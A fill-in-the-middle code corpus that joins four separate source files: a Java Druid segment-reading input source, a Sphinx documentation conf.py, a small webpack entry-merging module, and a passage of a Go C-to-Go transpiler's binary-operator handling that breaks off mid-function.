 * Jackson creator for an input source that reads rows back out of existing Druid segments.
 * Exactly one of {@code interval} and {@code segmentIds} must be supplied: 'interval' is the
 * end-user form, while 'segments' is filled in by the supervisor task when it splits itself
 * for parallel batch ingestion (see the comment on the parameter below).
 *
 * @throws IAE if both or neither of 'interval' and 'segments' are specified
 * @throws NullPointerException if dataSource or any injected dependency is null
 */
@JsonCreator
public DruidInputSource(
    @JsonProperty("dataSource") final String dataSource,
    @JsonProperty("interval") @Nullable Interval interval,
    // Specifying "segments" is intended only for when this FirehoseFactory has split itself,
    // not for direct end user use.
    @JsonProperty("segments") @Nullable List<WindowedSegmentId> segmentIds,
    @JsonProperty("filter") DimFilter dimFilter,
    @Nullable @JsonProperty("dimensions") List<String> dimensions,
    @Nullable @JsonProperty("metrics") List<String> metrics,
    @JacksonInject IndexIO indexIO,
    @JacksonInject CoordinatorClient coordinatorClient,
    @JacksonInject SegmentLoaderFactory segmentLoaderFactory,
    @JacksonInject RetryPolicyFactory retryPolicyFactory
)
{
  Preconditions.checkNotNull(dataSource, "dataSource");
  // XOR check: exactly one of the two segment-selection modes must be used.
  if ((interval == null && segmentIds == null) || (interval != null && segmentIds != null)) {
    throw new IAE("Specify exactly one of 'interval' and 'segments'");
  }
  this.dataSource = dataSource;
  this.interval = interval;
  this.segmentIds = segmentIds;
  this.dimFilter = dimFilter;
  this.dimensions = dimensions;
  this.metrics = metrics;
  this.indexIO = Preconditions.checkNotNull(indexIO, "null IndexIO");
  this.coordinatorClient = Preconditions.checkNotNull(coordinatorClient, "null CoordinatorClient");
  this.segmentLoaderFactory = Preconditions.checkNotNull(segmentLoaderFactory, "null SegmentLoaderFactory");
  this.retryPolicyFactory = Preconditions.checkNotNull(retryPolicyFactory, "null RetryPolicyFactory");
}
@JsonProperty
public String getDataSource()
{<|fim▁hole|> @JsonProperty
/** @return The umbrella interval to read; null when explicit segment IDs were supplied instead. */
public Interval getInterval()
{
  return interval;
}

/**
 * @return The explicit segment IDs to read; null when an interval was supplied instead.
 *     Omitted from serialized JSON when null.
 */
@Nullable
@JsonProperty("segments")
@JsonInclude(Include.NON_NULL)
public List<WindowedSegmentId> getSegmentIds()
{
  return segmentIds;
}

/** @return The filter applied while reading rows from segments; may be null (no filtering). */
@JsonProperty("filter")
public DimFilter getDimFilter()
{
  return dimFilter;
}

/** @return Dimensions to read; null lets the reader derive them (see fixedFormatReader). */
@JsonProperty
public List<String> getDimensions()
{
  return dimensions;
}

/** @return Metrics to read; null lets the reader derive them from the segments (see fixedFormatReader). */
@JsonProperty
public List<String> getMetrics()
{
  return metrics;
}
/**
 * Build a reader over the selected segments. Segments are materialized lazily: the entity
 * iterator only downloads/opens a segment (via the SegmentLoader) when it is advanced.
 * Dimensions/metrics left null on this input source are derived from the segment timeline.
 */
@Override
protected InputSourceReader fixedFormatReader(InputRowSchema inputRowSchema, @Nullable File temporaryDirectory)
{
  final SegmentLoader segmentLoader = segmentLoaderFactory.manufacturate(temporaryDirectory);
  final List<TimelineObjectHolder<String, DataSegment>> timeline = createTimeline();
  // One input entity per partition chunk, windowed to its holder's interval.
  final Iterator<DruidSegmentInputEntity> entityIterator = FluentIterable
      .from(timeline)
      .transformAndConcat(holder -> {
        //noinspection ConstantConditions
        final PartitionHolder<DataSegment> partitionHolder = holder.getObject();
        //noinspection ConstantConditions
        return FluentIterable
            .from(partitionHolder)
            .transform(chunk -> new DruidSegmentInputEntity(segmentLoader, chunk.getObject(), holder.getInterval()));
      }).iterator();
  final List<String> effectiveDimensions = ReingestionTimelineUtils.getDimensionsToReingest(
      dimensions,
      inputRowSchema.getDimensionsSpec(),
      timeline
  );
  List<String> effectiveMetrics;
  if (metrics == null) {
    // No explicit metrics: take the union found across the timeline's segments.
    effectiveMetrics = ReingestionTimelineUtils.getUniqueMetrics(timeline);
  } else {
    effectiveMetrics = metrics;
  }
  final DruidSegmentInputFormat inputFormat = new DruidSegmentInputFormat(
      indexIO,
      dimFilter,
      effectiveDimensions,
      effectiveMetrics
  );
  return new InputEntityIteratingReader(
      inputRowSchema,
      inputFormat,
      entityIterator,
      temporaryDirectory
  );
}
/**
 * Resolve the segment timeline from whichever selection mode this source was built with.
 * Exactly one of 'interval' and 'segmentIds' is non-null (enforced by the constructor).
 */
private List<TimelineObjectHolder<String, DataSegment>> createTimeline()
{
  if (interval != null) {
    return getTimelineForInterval(coordinatorClient, retryPolicyFactory, dataSource, interval);
  }
  return getTimelineForSegmentIds(coordinatorClient, dataSource, segmentIds);
}
/**
 * Split the interval's segments into parallel-ingestion splits, honoring the hint spec.
 * If this source already carries explicit segment IDs, it IS a split and is returned as-is.
 */
@Override
public Stream<InputSplit<List<WindowedSegmentId>>> createSplits(
    InputFormat inputFormat,
    @Nullable SplitHintSpec splitHintSpec
)
{
  // segmentIds is supposed to be specified by the supervisor task during the parallel indexing.
  // If it's not null, segments are already split by the supervisor task and further split won't happen.
  if (segmentIds == null) {
    return Streams.sequentialStreamFrom(
        createSplits(
            coordinatorClient,
            retryPolicyFactory,
            dataSource,
            interval,
            splitHintSpec == null ? SplittableInputSource.DEFAULT_SPLIT_HINT_SPEC : splitHintSpec
        )
    );
  } else {
    return Stream.of(new InputSplit<>(segmentIds));
  }
}
/**
 * Count the splits that createSplits would produce. Note this actually materializes the
 * split iterator (coordinator calls included) just to size it; an already-split source is 1.
 */
@Override
public int estimateNumSplits(InputFormat inputFormat, @Nullable SplitHintSpec splitHintSpec)
{
  // segmentIds is supposed to be specified by the supervisor task during the parallel indexing.
  // If it's not null, segments are already split by the supervisor task and further split won't happen.
  if (segmentIds == null) {
    return Iterators.size(
        createSplits(
            coordinatorClient,
            retryPolicyFactory,
            dataSource,
            interval,
            splitHintSpec == null ? SplittableInputSource.DEFAULT_SPLIT_HINT_SPEC : splitHintSpec
        )
    );
  } else {
    return 1;
  }
}
/**
 * Build the per-task child source for one split: interval is dropped (null) and the split's
 * explicit segment IDs take its place; all other configuration and injected services are kept.
 */
@Override
public SplittableInputSource<List<WindowedSegmentId>> withSplit(InputSplit<List<WindowedSegmentId>> split)
{
  return new DruidInputSource(
      dataSource,
      null,
      split.get(),
      dimFilter,
      dimensions,
      metrics,
      indexIO,
      coordinatorClient,
      segmentLoaderFactory,
      retryPolicyFactory
  );
}
/**
 * Druid segments carry their own schema, so no user-supplied InputFormat is required
 * (this source uses its fixed DruidSegmentInputFormat internally).
 */
@Override
public boolean needsFormat()
{
  return false;
}
/**
 * Produce splits for all used segments of {@code dataSource} overlapping {@code interval}.
 * A SegmentsSplitHintSpec is translated to a MaxSizeSplitHintSpec; other hint specs are
 * used as-is. Segment IDs are fed to the hint spec in sorted order so segments from the
 * same time chunk tend to land in the same split.
 */
public static Iterator<InputSplit<List<WindowedSegmentId>>> createSplits(
    CoordinatorClient coordinatorClient,
    RetryPolicyFactory retryPolicyFactory,
    String dataSource,
    Interval interval,
    SplitHintSpec splitHintSpec
)
{
  final SplitHintSpec convertedSplitHintSpec;
  if (splitHintSpec instanceof SegmentsSplitHintSpec) {
    final SegmentsSplitHintSpec segmentsSplitHintSpec = (SegmentsSplitHintSpec) splitHintSpec;
    convertedSplitHintSpec = new MaxSizeSplitHintSpec(
        segmentsSplitHintSpec.getMaxInputSegmentBytesPerTask(),
        segmentsSplitHintSpec.getMaxNumSegments()
    );
  } else {
    convertedSplitHintSpec = splitHintSpec;
  }
  final List<TimelineObjectHolder<String, DataSegment>> timelineSegments = getTimelineForInterval(
      coordinatorClient,
      retryPolicyFactory,
      dataSource,
      interval
  );
  final Map<WindowedSegmentId, Long> segmentIdToSize = createWindowedSegmentIdFromTimeline(timelineSegments);
  //noinspection ConstantConditions
  return Iterators.transform(
      convertedSplitHintSpec.split(
          // segmentIdToSize is sorted by segment ID; useful for grouping up segments from the same time chunk into
          // the same input split.
          segmentIdToSize.keySet().iterator(),
          segmentId -> new InputFileAttribute(
              Preconditions.checkNotNull(segmentIdToSize.get(segmentId), "segment size for [%s]", segmentId)
          )
      ),
      InputSplit::new
  );
}
/**
 * Returns a map of {@link WindowedSegmentId} to size, sorted by {@link WindowedSegmentId#getSegmentId()}.
 * A segment appearing in several timeline holders yields ONE WindowedSegmentId carrying all
 * of those holders' intervals; size is the segment's reported byte size.
 */
private static SortedMap<WindowedSegmentId, Long> createWindowedSegmentIdFromTimeline(
    List<TimelineObjectHolder<String, DataSegment>> timelineHolders
)
{
  Map<DataSegment, WindowedSegmentId> windowedSegmentIds = new HashMap<>();
  for (TimelineObjectHolder<String, DataSegment> holder : timelineHolders) {
    for (PartitionChunk<DataSegment> chunk : holder.getObject()) {
      // Accumulate each holder's interval onto the (single) id for this segment.
      windowedSegmentIds.computeIfAbsent(
          chunk.getObject(),
          segment -> new WindowedSegmentId(segment.getId().toString(), new ArrayList<>())
      ).addInterval(holder.getInterval());
    }
  }
  // It is important to create this map after windowedSegmentIds is completely filled, because WindowedSegmentIds
  // can be updated while being constructed. (Intervals are added.)
  SortedMap<WindowedSegmentId, Long> segmentSizeMap = new TreeMap<>(WINDOWED_SEGMENT_ID_COMPARATOR);
  windowedSegmentIds.forEach((segment, segmentId) -> segmentSizeMap.put(segmentId, segment.getSize()));
  return segmentSizeMap;
}
/**
 * Fetch the used segments overlapping {@code interval} from the coordinator and arrange them
 * into a versioned timeline. The coordinator call is retried with jittered backoff per the
 * retry policy; once the policy is exhausted the last failure is rethrown.
 *
 * @throws RuntimeException wrapping InterruptedException if the backoff sleep is interrupted
 */
public static List<TimelineObjectHolder<String, DataSegment>> getTimelineForInterval(
    CoordinatorClient coordinatorClient,
    RetryPolicyFactory retryPolicyFactory,
    String dataSource,
    Interval interval
)
{
  Preconditions.checkNotNull(interval);
  // This call used to use the TaskActionClient, so for compatibility we use the same retry configuration
  // as TaskActionClient.
  final RetryPolicy retryPolicy = retryPolicyFactory.makeRetryPolicy();
  Collection<DataSegment> usedSegments;
  while (true) {
    try {
      usedSegments = coordinatorClient.fetchUsedSegmentsInDataSourceForIntervals(
          dataSource,
          Collections.singletonList(interval)
      );
      break;
    }
    catch (Throwable e) {
      // Deliberately broad: any failure is retried until the policy gives up (delay == null).
      LOG.warn(e, "Exception getting database segments");
      final Duration delay = retryPolicy.getAndIncrementRetryDelay();
      if (delay == null) {
        throw e;
      } else {
        final long sleepTime = jitter(delay.getMillis());
        LOG.info("Will try again in [%s].", new Duration(sleepTime).toString());
        try {
          Thread.sleep(sleepTime);
        }
        catch (InterruptedException e2) {
          throw new RuntimeException(e2);
        }
      }
    }
  }
  return VersionedIntervalTimeline.forSegments(usedSegments).lookup(interval);
}
/**
 * Reconstruct a timeline from explicitly listed (windowed) segment IDs, fetching each
 * segment's metadata from the coordinator. Segments sharing an interval are merged into
 * one holder and must share a version; distinct intervals must not overlap.
 *
 * @throws ISE if two segments on the same interval carry different versions
 * @throws IAE if two distinct intervals overlap
 */
public static List<TimelineObjectHolder<String, DataSegment>> getTimelineForSegmentIds(
    CoordinatorClient coordinatorClient,
    String dataSource,
    List<WindowedSegmentId> segmentIds
)
{
  final SortedMap<Interval, TimelineObjectHolder<String, DataSegment>> timeline = new TreeMap<>(
      Comparators.intervalsByStartThenEnd()
  );
  for (WindowedSegmentId windowedSegmentId : Preconditions.checkNotNull(segmentIds, "segmentIds")) {
    final DataSegment segment = coordinatorClient.fetchUsedSegment(
        dataSource,
        windowedSegmentId.getSegmentId()
    );
    for (Interval interval : windowedSegmentId.getIntervals()) {
      final TimelineObjectHolder<String, DataSegment> existingHolder = timeline.get(interval);
      if (existingHolder != null) {
        if (!existingHolder.getVersion().equals(segment.getVersion())) {
          throw new ISE("Timeline segments with the same interval should have the same version: " +
                        "existing version[%s] vs new segment[%s]", existingHolder.getVersion(), segment);
        }
        existingHolder.getObject().add(segment.getShardSpec().createChunk(segment));
      } else {
        timeline.put(
            interval,
            new TimelineObjectHolder<>(
                interval,
                segment.getInterval(),
                segment.getVersion(),
                new PartitionHolder<>(segment.getShardSpec().createChunk(segment))
            )
        );
      }
    }
  }
  // Validate that none of the given windows overlaps (except for when multiple segments share exactly the
  // same interval).
  Interval lastInterval = null;
  for (Interval interval : timeline.keySet()) {
    if (lastInterval != null && interval.overlaps(lastInterval)) {
      throw new IAE(
          "Distinct intervals in input segments may not overlap: [%s] vs [%s]",
          lastInterval,
          interval
      );
    }
    lastInterval = interval;
  }
  return new ArrayList<>(timeline.values());
}
/**
 * Add Gaussian jitter (stddev = input/4) to a backoff delay, clamped to be non-negative.
 * @param input the base delay in milliseconds
 * @return the jittered delay, never negative
 */
private static long jitter(long input)
{
  final double noise = ThreadLocalRandom.current().nextGaussian() * input / 4.0;
  final long jittered = input + (long) noise;
  return Math.max(jittered, 0L);
}
}<|fim▁end|> | return dataSource;
}
@Nullable |
<|file_name|>conf.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import inspect
# Absolute directory containing this conf.py (robust to whatever CWD Sphinx uses).
__location__ = os.path.join(os.getcwd(), os.path.dirname(
    inspect.getfile(inspect.currentframe())))

import subprocess

# Regenerate the API .rst stubs from the package sources on every docs build;
# '-f' forces overwriting previously generated files.
output_dir = os.path.join(__location__, "../docs/_rst")
module_dir = os.path.join(__location__, "../mymeal")
cmd_line_template = "sphinx-apidoc -f -o {outputdir} {moduledir}"
cmd_line = cmd_line_template.format(outputdir=output_dir, moduledir=module_dir)
# NOTE(review): the return code is ignored, so the build proceeds even if apidoc fails.
subprocess.call(cmd_line, shell=True)
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx', 'sphinx.ext.todo',
'sphinx.ext.autosummary', 'sphinx.ext.viewcode', 'sphinx.ext.coverage',
'sphinx.ext.doctest', 'sphinx.ext.ifconfig', 'sphinx.ext.pngmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'mymeal'
copyright = u'2014, Michael Ziegler'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '' # Is set by calling `setup.py docs`
# The full version, including alpha/beta/rc tags.
release = '' # Is set by calling `setup.py docs`
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
<|fim▁hole|># today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# Best effort: pull the real release string from the installed package; if
# 'mymeal' is not importable (docs built without installation), keep the
# placeholder set earlier in this file.
try:
    from mymeal import __version__ as version
except ImportError:
    pass
else:
    release = version
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = ""
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'mymeal-doc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
# 'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'user_guide.tex', u'mymeal Documentation',
u'Michael Ziegler', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = ""
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- External mapping ------------------------------------------------------------
python_version = '.'.join(map(str, sys.version_info[0:2]))
intersphinx_mapping = {
'sphinx': ('http://sphinx.pocoo.org', None),
'python': ('http://docs.python.org/' + python_version, None),
'matplotlib': ('http://matplotlib.sourceforge.net', None),
'numpy': ('http://docs.scipy.org/doc/numpy', None),
'sklearn': ('http://scikit-learn.org/stable', None),
'pandas': ('http://pandas.pydata.org/pandas-docs/stable', None),
'scipy': ('http://docs.scipy.org/doc/scipy/reference/', None),
}<|fim▁end|> | # There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used: |
<|file_name|>entry.config.js<|end_file_name|><|fim▁begin|>import merge from 'webpack-merge'
import { isString } from '../../utils'<|fim▁hole|> }
if (Array.isArray(settings)) {
return merge.smart(config, { entry: settings })
}
throw new Error('Unexpected webpack entry value')
}<|fim▁end|> |
export default (config, settings) => {
if (isString(settings)) {
return merge.smart(config, { entry: [settings] }) |
<|file_name|>binary.go<|end_file_name|><|fim▁begin|>// This file contains functions for transpiling binary operator expressions.
package transpiler
import (
"fmt"
goast "go/ast"
"go/token"
"strings"
"github.com/elliotchance/c2go/ast"
"github.com/elliotchance/c2go/program"
"github.com/elliotchance/c2go/types"
"github.com/elliotchance/c2go/util"
)
// Comma problem. Example:
// for (int i=0,j=0;i+=1,j<5;i++,j++){...}
// For solving - we have to separate the
// binary operator "," to 2 parts:
// part 1(pre ): left part - typically one or more some expessions
// part 2(stmt): right part - always only one expression, with or witout
// logical operators like "==", "!=", ...
func transpileBinaryOperatorComma(n *ast.BinaryOperator, p *program.Program) (
stmt goast.Stmt, preStmts []goast.Stmt, err error) {
defer func() {
if err != nil {
err = fmt.Errorf("Cannot transpile operator comma : err = %v", err)
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}()
left, err := transpileToStmts(n.Children()[0], p)
if err != nil {
return nil, nil, err
}
right, err := transpileToStmts(n.Children()[1], p)
if err != nil {
return nil, nil, err
}
if left == nil || right == nil {
return nil, nil, fmt.Errorf("Cannot transpile binary operator comma: right = %v , left = %v", right, left)
}
preStmts = append(preStmts, left...)
preStmts = append(preStmts, right...)
if len(preStmts) >= 2 {
return preStmts[len(preStmts)-1], preStmts[:len(preStmts)-1], nil
}
if len(preStmts) == 1 {
return preStmts[0], nil, nil
}
return nil, nil, nil
}
func transpileBinaryOperator(n *ast.BinaryOperator, p *program.Program, exprIsStmt bool) (
expr goast.Expr, eType string, preStmts []goast.Stmt, postStmts []goast.Stmt, err error) {
defer func() {
if err != nil {
err = fmt.Errorf("Cannot transpile BinaryOperator with type '%s' : result type = {%s}. Error: %v", n.Type, eType, err)
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}()
operator := getTokenForOperator(n.Operator)
// Char overflow
// BinaryOperator 0x2b74458 <line:506:7, col:18> 'int' '!='
// |-ImplicitCastExpr 0x2b74440 <col:7, col:10> 'int' <IntegralCast>
// | `-ImplicitCastExpr 0x2b74428 <col:7, col:10> 'char' <LValueToRValue>
// | `-...
// `-ParenExpr 0x2b74408 <col:15, col:18> 'int'
// `-UnaryOperator 0x2b743e8 <col:16, col:17> 'int' prefix '-'
// `-IntegerLiteral 0x2b743c8 <col:17> 'int' 1
if n.Operator == "!=" {
var leftOk bool
if l0, ok := n.ChildNodes[0].(*ast.ImplicitCastExpr); ok && l0.Type == "int" {
if len(l0.ChildNodes) > 0 {
if l1, ok := l0.ChildNodes[0].(*ast.ImplicitCastExpr); ok && l1.Type == "char" {
leftOk = true
}
}
}
if leftOk {
if r0, ok := n.ChildNodes[1].(*ast.ParenExpr); ok && r0.Type == "int" {
if len(r0.ChildNodes) > 0 {
if r1, ok := r0.ChildNodes[0].(*ast.UnaryOperator); ok && r1.IsPrefix && r1.Operator == "-" {
if r2, ok := r1.ChildNodes[0].(*ast.IntegerLiteral); ok && r2.Type == "int" {
r0.ChildNodes[0] = &ast.BinaryOperator{
Type: "int",
Type2: "int",
Operator: "+",
ChildNodes: []ast.Node{
r1,
&ast.IntegerLiteral{
Type: "int",
Value: "256",
},
},
}
}
}
}
}
}
}
// Example of C code
// a = b = 1
// // Operation equal transpile from right to left
// Solving:
// b = 1, a = b
// // Operation comma tranpile from left to right
// If we have for example:
// a = b = c = 1<|fim▁hole|> // |-----------|
// this part, created in according to
// recursive working
// Example of AST tree for problem:
// |-BinaryOperator 0x2f17870 <line:13:2, col:10> 'int' '='
// | |-DeclRefExpr 0x2f177d8 <col:2> 'int' lvalue Var 0x2f176d8 'x' 'int'
// | `-BinaryOperator 0x2f17848 <col:6, col:10> 'int' '='
// | |-DeclRefExpr 0x2f17800 <col:6> 'int' lvalue Var 0x2f17748 'y' 'int'
// | `-IntegerLiteral 0x2f17828 <col:10> 'int' 1
//
// Example of AST tree for solution:
// |-BinaryOperator 0x368e8d8 <line:13:2, col:13> 'int' ','
// | |-BinaryOperator 0x368e820 <col:2, col:6> 'int' '='
// | | |-DeclRefExpr 0x368e7d8 <col:2> 'int' lvalue Var 0x368e748 'y' 'int'
// | | `-IntegerLiteral 0x368e800 <col:6> 'int' 1
// | `-BinaryOperator 0x368e8b0 <col:9, col:13> 'int' '='
// | |-DeclRefExpr 0x368e848 <col:9> 'int' lvalue Var 0x368e6d8 'x' 'int'
// | `-ImplicitCastExpr 0x368e898 <col:13> 'int' <LValueToRValue>
// | `-DeclRefExpr 0x368e870 <col:13> 'int' lvalue Var 0x368e748 'y' 'int'
if getTokenForOperator(n.Operator) == token.ASSIGN {
switch c := n.Children()[1].(type) {
case *ast.BinaryOperator:
if getTokenForOperator(c.Operator) == token.ASSIGN {
bSecond := ast.BinaryOperator{
Type: c.Type,
Operator: "=",
}
bSecond.AddChild(n.Children()[0])
var impl ast.ImplicitCastExpr
impl.Type = c.Type
impl.Kind = "LValueToRValue"
impl.AddChild(c.Children()[0])
bSecond.AddChild(&impl)
var bComma ast.BinaryOperator
bComma.Operator = ","
bComma.Type = c.Type
bComma.AddChild(c)
bComma.AddChild(&bSecond)
// goast.NewBinaryExpr takes care to wrap any AST children safely in a closure, if needed.
return transpileBinaryOperator(&bComma, p, exprIsStmt)
}
}
}
// Example of C code
// a = 1, b = a
// Solving
// a = 1; // preStmts
// b = a; // n
// Example of AST tree for problem:
// |-BinaryOperator 0x368e8d8 <line:13:2, col:13> 'int' ','
// | |-BinaryOperator 0x368e820 <col:2, col:6> 'int' '='
// | | |-DeclRefExpr 0x368e7d8 <col:2> 'int' lvalue Var 0x368e748 'y' 'int'
// | | `-IntegerLiteral 0x368e800 <col:6> 'int' 1
// | `-BinaryOperator 0x368e8b0 <col:9, col:13> 'int' '='
// | |-DeclRefExpr 0x368e848 <col:9> 'int' lvalue Var 0x368e6d8 'x' 'int'
// | `-ImplicitCastExpr 0x368e898 <col:13> 'int' <LValueToRValue>
// | `-DeclRefExpr 0x368e870 <col:13> 'int' lvalue Var 0x368e748 'y' 'int'
//
// Example of AST tree for solution:
// |-BinaryOperator 0x21a7820 <line:13:2, col:6> 'int' '='
// | |-DeclRefExpr 0x21a77d8 <col:2> 'int' lvalue Var 0x21a7748 'y' 'int'
// | `-IntegerLiteral 0x21a7800 <col:6> 'int' 1
// |-BinaryOperator 0x21a78b0 <line:14:2, col:6> 'int' '='
// | |-DeclRefExpr 0x21a7848 <col:2> 'int' lvalue Var 0x21a76d8 'x' 'int'
// | `-ImplicitCastExpr 0x21a7898 <col:6> 'int' <LValueToRValue>
// | `-DeclRefExpr 0x21a7870 <col:6> 'int' lvalue Var 0x21a7748 'y' 'int'
if getTokenForOperator(n.Operator) == token.COMMA {
stmts, _, newPre, newPost, err := transpileToExpr(n.Children()[0], p, exprIsStmt)
if err != nil {
return nil, "unknown50", nil, nil, err
}
preStmts = append(preStmts, newPre...)
preStmts = append(preStmts, util.NewExprStmt(stmts))
preStmts = append(preStmts, newPost...)
var st string
stmts, st, newPre, newPost, err = transpileToExpr(n.Children()[1], p, exprIsStmt)
if err != nil {
return nil, "unknown51", nil, nil, err
}
// Theoretically , we don't have any preStmts or postStmts
// from n.Children()[1]
if len(newPre) > 0 || len(newPost) > 0 {
p.AddMessage(p.GenerateWarningMessage(
fmt.Errorf("Not support length pre or post stmts: {%d,%d}", len(newPre), len(newPost)), n))
}
return stmts, st, preStmts, postStmts, nil
}
left, leftType, newPre, newPost, err := atomicOperation(n.Children()[0], p)
if err != nil {
return nil, "unknown52", nil, nil, err
}
preStmts, postStmts = combinePreAndPostStmts(preStmts, postStmts, newPre, newPost)
right, rightType, newPre, newPost, err := atomicOperation(n.Children()[1], p)
if err != nil {
return nil, "unknown53", nil, nil, err
}
var adjustPointerDiff int
if types.IsPointer(p, leftType) && types.IsPointer(p, rightType) &&
(operator == token.SUB ||
operator == token.LSS || operator == token.GTR ||
operator == token.LEQ || operator == token.GEQ) {
baseSize, err := types.SizeOf(p, types.GetBaseType(leftType))
if operator == token.SUB && err == nil && baseSize > 1 {
adjustPointerDiff = baseSize
}
left, leftType, err = GetUintptrForPointer(p, left, leftType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
right, rightType, err = GetUintptrForPointer(p, right, rightType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}
if types.IsPointer(p, leftType) && types.IsPointer(p, rightType) &&
(operator == token.EQL || operator == token.NEQ) &&
leftType != "NullPointerType *" && rightType != "NullPointerType *" {
left, leftType, err = GetUintptrForPointer(p, left, leftType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
right, rightType, err = GetUintptrForPointer(p, right, rightType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
}
preStmts, postStmts = combinePreAndPostStmts(preStmts, postStmts, newPre, newPost)
returnType := types.ResolveTypeForBinaryOperator(p, n.Operator, leftType, rightType)
if operator == token.LAND || operator == token.LOR {
left, err = types.CastExpr(p, left, leftType, "bool")
p.AddMessage(p.GenerateWarningOrErrorMessage(err, n, left == nil))
if left == nil {
left = util.NewNil()
}
right, err = types.CastExpr(p, right, rightType, "bool")
p.AddMessage(p.GenerateWarningOrErrorMessage(err, n, right == nil))
if right == nil {
right = util.NewNil()
}
resolvedLeftType, err := types.ResolveType(p, leftType)
if err != nil {
p.AddMessage(p.GenerateWarningMessage(err, n))
}
expr := util.NewBinaryExpr(left, operator, right, resolvedLeftType, exprIsStmt)
return expr, "bool", preStmts, postStmts, nil
}
// The right hand argument of the shift left or shift right operators
// in Go must be unsigned integers. In C, shifting with a negative shift
// count is undefined behaviour (so we should be able to ignore that case).
// To handle this, cast the shift count to a uint64.
if operator == token.SHL || operator == token.SHR {
right, err = types.CastExpr(p, right, rightType, "unsigned long long")
p.AddMessage(p.GenerateWarningOrErrorMessage(err, n, right == nil))
if right == nil {
right = util.NewNil()
}
return util.NewBinaryExpr(left, operator, right, "uint64", exprIsStmt),
leftType, preStmts, postStmts, nil
}
// pointer arithmetic
if types.IsPointer(p, n.Type) {
if operator == token.ADD || operator == token.SUB {
if types.IsPointer(p, leftType) {
expr, eType, newPre, newPost, err =
pointerArithmetic(p, left, leftType, right, rightType, operator)
} else {
expr, eType, newPre, newPost, err =
pointerArithmetic(p, right, rightType, left, leftType, operator)
}
if err != nil {
return
}
if expr == nil {
